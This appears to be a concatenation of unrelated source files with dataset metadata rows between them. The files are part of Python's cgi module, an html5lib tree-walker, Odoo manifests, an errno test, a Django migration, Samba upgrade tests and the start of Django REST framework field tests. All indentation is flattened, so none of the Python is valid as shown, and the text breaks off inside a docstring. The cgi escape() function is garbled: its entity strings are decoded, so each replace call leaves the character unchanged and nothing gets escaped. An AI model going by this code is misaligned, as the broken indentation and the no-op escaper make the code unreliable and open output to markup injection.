between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
self.fp = fp
self.encoding = encoding
self.errors = errors
self.headers = headers
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
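    # Illustrative use of the three accessors above (a sketch):
    #   form = FieldStorage()
    #   form.getvalue('tag')   # single value, list of values, or None
    #   form.getfirst('tag')   # always a single value (or the default)
    #   form.getlist('tag')    # always a list, possibly empty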
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __nonzero__(self):
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
self.list = []
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
FieldStorageClass = None
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# first line holds boundary ; ignore it, or check that
# b"--" + ib == first_line.strip() ?
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing,self.limit-self.bytes_read,
self.encoding, self.errors)
self.bytes_read += part.bytes_read
self.list.append(part)
if self.bytes_read >= self.length:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
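    # Illustrative override (a sketch; the subclass name and directory are
    # hypothetical):
    #
    #   class SpoolFieldStorage(FieldStorage):
    #       def make_file(self):
    #           # keep uploads in a visible spool directory instead of an
    #           # anonymous, auto-deleted temporary file
    #           return tempfile.NamedTemporaryFile(
    #               "wb+", dir="/var/spool/uploads", delete=False)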
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except os.error as msg:
print("os.error:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def escape(s, quote=None):
"""Deprecated API."""
warn("cgi.escape is deprecated, use html.escape instead",
PendingDeprecationWarning, stacklevel=2)
s = s.replace("&", "&") # Must be done first!
s = s.replace("<", "<")
s = s.replace(">", ">")
if quote:
s = s.replace('"', """)
return s
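# Illustrative result (a sketch): escape('<a href="x">') returns
# '&lt;a href="x"&gt;'; pass a true "quote" argument to encode double
# quotes as well.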
def valid_boundary(s, _vb_pattern=None):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| apache-2.0 | 648,747,184,364,241,300 | 32.544747 | 79 | 0.568757 | false |
clstl/servo | tests/wpt/css-tests/tools/html5lib/html5lib/treewalkers/__init__.py | 1229 | 2323 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
import sys
from ..utils import default_etree
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - The xml.dom.minidom DOM implementation
"pulldom" - The xml.dom.pulldom event stream
"etree" - A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
"lxml" - Optimized walker for lxml.etree
"genshi" - a Genshi stream
implementation - (Currently applies to the "etree" tree type only). A module
implementing the tree type e.g. xml.etree.ElementTree or
cElementTree."""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType in ("dom", "pulldom"):
name = "%s.%s" % (__name__, treeType)
__import__(name)
mod = sys.modules[name]
treeWalkerCache[treeType] = mod.TreeWalker
elif treeType == "genshi":
from . import genshistream
treeWalkerCache[treeType] = genshistream.TreeWalker
elif treeType == "lxml":
from . import lxmletree
treeWalkerCache[treeType] = lxmletree.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
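# Illustrative use (a sketch, following the usual html5lib pattern):
#
#   import html5lib
#   document = html5lib.parse("<p>Hello</p>")  # default etree-based tree
#   walker = getTreeWalker("etree")
#   tokens = list(walker(document))            # token stream for a serializer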
| mpl-2.0 | 131,010,001,121,178,560 | 39.754386 | 80 | 0.63969 | false |
hurrinico/l10n-italy | l10n_it_ricevute_bancarie/__openerp__.py | 1 | 2257 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2012 Andrea Cometa.
# Email: [email protected]
# Web site: http://www.andreacometa.it
# Copyright (C) 2012 Agile Business Group sagl (<http://www.agilebg.com>)
# Copyright (C) 2012 Domsense srl (<http://www.domsense.com>)
# Copyright (C) 2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "Ricevute Bancarie",
'version': "8.0.1.3.0",
'author': "Odoo Community Association (OCA)",
'category': "Accounting & Finance",
'website': "http://www.odoo-italia.org",
'license': "AGPL-3",
'depends': [
'account_voucher',
'l10n_it_fiscalcode',
'account_due_list',
'base_iban',
'l10n_it_abicab'],
'data': [
"views/partner_view.xml",
"views/configuration_view.xml",
"riba_sequence.xml",
"views/wizard_accreditation.xml",
"views/wizard_unsolved.xml",
"views/riba_view.xml",
"views/account_view.xml",
"views/wizard_riba_issue.xml",
"views/wizard_riba_file_export.xml",
"views/account_config_view.xml",
"riba_workflow.xml",
"security/ir.model.access.csv",
],
'images': [],
'demo': ["demo/riba_demo.xml"],
'test': [
'test/riba_invoice.yml',
'test/issue_riba.yml',
'test/unsolved_riba.yml',
],
'installable': True,
}
| agpl-3.0 | -8,221,688,291,268,461,000 | 35.403226 | 78 | 0.57953 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_errno.py | 5 | 1160 | #! /usr/bin/env python
"""Test the errno module
Roger E. Masse
"""
import errno
from test import support
import unittest
std_c_errors = frozenset(['EDOM', 'ERANGE'])
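# Sketch of the mapping these tests rely on:
#   errno.errorcode[errno.EDOM] == 'EDOM'   # numeric code -> symbolic name
#   hasattr(errno, 'EDOM')                  # the name is a module attribute too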
class ErrnoAttributeTests(unittest.TestCase):
def test_for_improper_attributes(self):
# No unexpected attributes should be on the module.
for error_code in std_c_errors:
self.assert_(hasattr(errno, error_code),
"errno is missing %s" % error_code)
def test_using_errorcode(self):
# Every key value in errno.errorcode should be on the module.
for value in errno.errorcode.values():
self.assert_(hasattr(errno, value), 'no %s attr in errno' % value)
class ErrorcodeTests(unittest.TestCase):
def test_attributes_in_errorcode(self):
for attribute in errno.__dict__.keys():
if attribute.isupper():
self.assert_(getattr(errno, attribute) in errno.errorcode,
'no %s attr in errno.errorcode' % attribute)
def test_main():
support.run_unittest(ErrnoAttributeTests, ErrorcodeTests)
if __name__ == '__main__':
test_main()
| mit | -8,687,603,400,186,094,000 | 28 | 78 | 0.630172 | false |
DarkArtek/FFXIVITAFC | news2/migrations/0001_initial.py | 1 | 1204 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-28 08:26
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='PostNews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Titolo Articolo')),
('text', models.TextField(verbose_name='Contenuto')),
('created_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Data di Creazione')),
('published_date', models.DateTimeField(blank=True, null=True, verbose_name='Data di Pubblicazione')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Autore')),
],
),
]
| unlicense | 7,943,794,929,761,284,000 | 37.83871 | 143 | 0.645349 | false |
shingonoide/odoo | addons/hr_contract/__openerp__.py | 260 | 1834 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Contracts',
'version': '1.0',
'category': 'Human Resources',
'description': """
Add all information on the employee form to manage contracts.
=============================================================
* Contract
* Place of Birth,
* Medical Examination Date
* Company Vehicle
You can assign several contracts per employee.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/employees',
'depends': ['base_action_rule', 'hr'],
'data': [
'security/ir.model.access.csv',
'hr_contract_view.xml',
'hr_contract_data.xml',
'base_action_rule_view.xml',
],
'demo': [],
'test': ['test/test_hr_contract.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -7,011,756,181,744,282,000 | 34.269231 | 78 | 0.580153 | false |
sYnfo/samba-1 | python/samba/tests/upgradeprovisionneeddc.py | 32 | 7461 | # Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <[email protected]> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Tests for samba.upgradeprovision that need a DC."""
import os
import re
import shutil
from samba import param
from samba.credentials import Credentials
from samba.auth import system_session
from samba.provision import getpolicypath,find_provision_key_parameters
from samba.upgradehelpers import (get_paths, get_ldbs,
identic_rename,
updateOEMInfo, getOEMInfo, update_gpo,
delta_update_basesamdb,
update_dns_account_password,
search_constructed_attrs_stored,
increment_calculated_keyversion_number)
from samba.tests import env_loadparm, TestCaseInTempDir
from samba.tests.provision import create_dummy_secretsdb
import ldb
def dummymessage(a=None, b=None):
pass
smb_conf_path = "%s/%s/%s" % (os.environ["SELFTEST_PREFIX"], "ad_dc_ntvfs", "etc/smb.conf")
class UpgradeProvisionBasicLdbHelpersTestCase(TestCaseInTempDir):
"""Some simple tests for individual functions in the provisioning code.
"""
def test_get_ldbs(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
get_ldbs(paths, creds, system_session(), lp)
def test_find_key_param(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
rootdn = "dc=samba,dc=example,dc=com"
ldbs = get_ldbs(paths, creds, system_session(), lp)
names = find_provision_key_parameters(ldbs.sam, ldbs.secrets, ldbs.idmap,
paths, smb_conf_path, lp)
self.assertEquals(names.realm, "SAMBA.EXAMPLE.COM")
self.assertEquals(str(names.rootdn).lower(), rootdn.lower())
self.assertNotEquals(names.policyid_dc, None)
self.assertNotEquals(names.ntdsguid, "")
class UpgradeProvisionWithLdbTestCase(TestCaseInTempDir):
def _getEmptyDbName(self):
return os.path.join(self.tempdir, "sam.ldb")
def setUp(self):
super(UpgradeProvisionWithLdbTestCase, self).setUp()
paths = get_paths(param, None, smb_conf_path)
self.creds = Credentials()
self.lp = env_loadparm()
self.creds.guess(self.lp)
self.paths = paths
self.ldbs = get_ldbs(paths, self.creds, system_session(), self.lp)
self.names = find_provision_key_parameters(self.ldbs.sam,
self.ldbs.secrets, self.ldbs.idmap, paths, smb_conf_path,
self.lp)
self.referencedb = create_dummy_secretsdb(
os.path.join(self.tempdir, "ref.ldb"))
def test_search_constructed_attrs_stored(self):
hashAtt = search_constructed_attrs_stored(self.ldbs.sam,
self.names.rootdn,
["msds-KeyVersionNumber"])
self.assertFalse(hashAtt.has_key("msds-KeyVersionNumber"))
def test_increment_calculated_keyversion_number(self):
dn = "CN=Administrator,CN=Users,%s" % self.names.rootdn
        # We construct a simple hash for the user administrator
hash = {}
# And we want the version to be 140
hash[dn.lower()] = 140
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
# This function should not decrement the version
hash[dn.lower()] = 130
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
def test_identic_rename(self):
rootdn = "DC=samba,DC=example,DC=com"
guestDN = ldb.Dn(self.ldbs.sam, "CN=Guest,CN=Users,%s" % rootdn)
identic_rename(self.ldbs.sam, guestDN)
res = self.ldbs.sam.search(expression="(name=Guest)", base=rootdn,
scope=ldb.SCOPE_SUBTREE, attrs=["dn"])
self.assertEquals(len(res), 1)
self.assertEquals(str(res[0]["dn"]), "CN=Guest,CN=Users,%s" % rootdn)
def test_delta_update_basesamdb(self):
dummysampath = self._getEmptyDbName()
delta_update_basesamdb(self.paths.samdb, dummysampath,
self.creds, system_session(), self.lp,
dummymessage)
def test_update_gpo_simple(self):
dir = getpolicypath(self.paths.sysvol, self.names.dnsdomain,
self.names.policyid)
shutil.rmtree(dir)
self.assertFalse(os.path.isdir(dir))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
self.assertTrue(os.path.isdir(dir))
def test_update_gpo_acl(self):
path = os.path.join(self.tempdir, "testupdategpo")
save = self.paths.sysvol
self.paths.sysvol = path
os.mkdir(path)
os.mkdir(os.path.join(path, self.names.dnsdomain))
os.mkdir(os.path.join(os.path.join(path, self.names.dnsdomain),
"Policies"))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
shutil.rmtree(path)
self.paths.sysvol = save
def test_getOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(oem, "")
def test_update_dns_account(self):
update_dns_account_password(self.ldbs.sam, self.ldbs.secrets,
self.names)
def test_updateOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
updateOEMInfo(self.ldbs.sam, basedn)
oem2 = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(str(oem), str(oem2))
self.assertTrue(re.match(".*upgrade to.*", str(oem2)))
def tearDown(self):
for name in ["ref.ldb", "secrets.ldb", "secrets.tdb", "secrets.tdb.bak", "secrets.ntdb", "sam.ldb"]:
path = os.path.join(self.tempdir, name)
if os.path.exists(path):
os.unlink(path)
super(UpgradeProvisionWithLdbTestCase, self).tearDown()
| gpl-3.0 | -8,156,522,751,536,589,000 | 40.681564 | 108 | 0.602332 | false |
johnraz/django-rest-framework | tests/test_fields.py | 1 | 54851 | import datetime
import os
import uuid
from decimal import Decimal
import pytest
from django.http import QueryDict
from django.test import TestCase, override_settings
from django.utils import six, timezone
import rest_framework
from rest_framework import serializers
# Tests for field keyword arguments and core functionality.
# ---------------------------------------------------------
class TestEmpty:
"""
Tests for `required`, `allow_null`, `allow_blank`, `default`.
"""
def test_required(self):
"""
By default a field must be included in the input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation()
assert exc_info.value.detail == ['This field is required.']
def test_not_required(self):
"""
If `required=False` then a field may be omitted from the input.
"""
field = serializers.IntegerField(required=False)
with pytest.raises(serializers.SkipField):
field.run_validation()
def test_disallow_null(self):
"""
By default `None` is not a valid input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(None)
assert exc_info.value.detail == ['This field may not be null.']
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.IntegerField(allow_null=True)
output = field.run_validation(None)
assert output is None
def test_disallow_blank(self):
"""
By default '' is not a valid input.
"""
field = serializers.CharField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation('')
assert exc_info.value.detail == ['This field may not be blank.']
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.CharField(allow_blank=True)
output = field.run_validation('')
assert output == ''
def test_default(self):
"""
If `default` is set, then omitted values get the default input.
"""
field = serializers.IntegerField(default=123)
output = field.run_validation()
assert output is 123
class TestSource:
def test_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='other')
serializer = ExampleSerializer(data={'example_field': 'abc'})
assert serializer.is_valid()
assert serializer.validated_data == {'other': 'abc'}
def test_redundant_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `source='example_field'` on field "
"'CharField' in serializer 'ExampleSerializer', because it is the "
"same as the field name. Remove the `source` keyword argument."
)
def test_callable_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable')
class ExampleInstance(object):
def example_callable(self):
return 'example callable value'
serializer = ExampleSerializer(ExampleInstance())
assert serializer.data['example_field'] == 'example callable value'
def test_callable_source_raises(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable', read_only=True)
class ExampleInstance(object):
def example_callable(self):
raise AttributeError('method call failed')
with pytest.raises(ValueError) as exc_info:
serializer = ExampleSerializer(ExampleInstance())
serializer.data.items()
assert 'method call failed' in str(exc_info.value)
class TestReadOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
read_only = serializers.ReadOnlyField()
writable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_read_only(self):
"""
        Read-only fields should not be included in validation.
"""
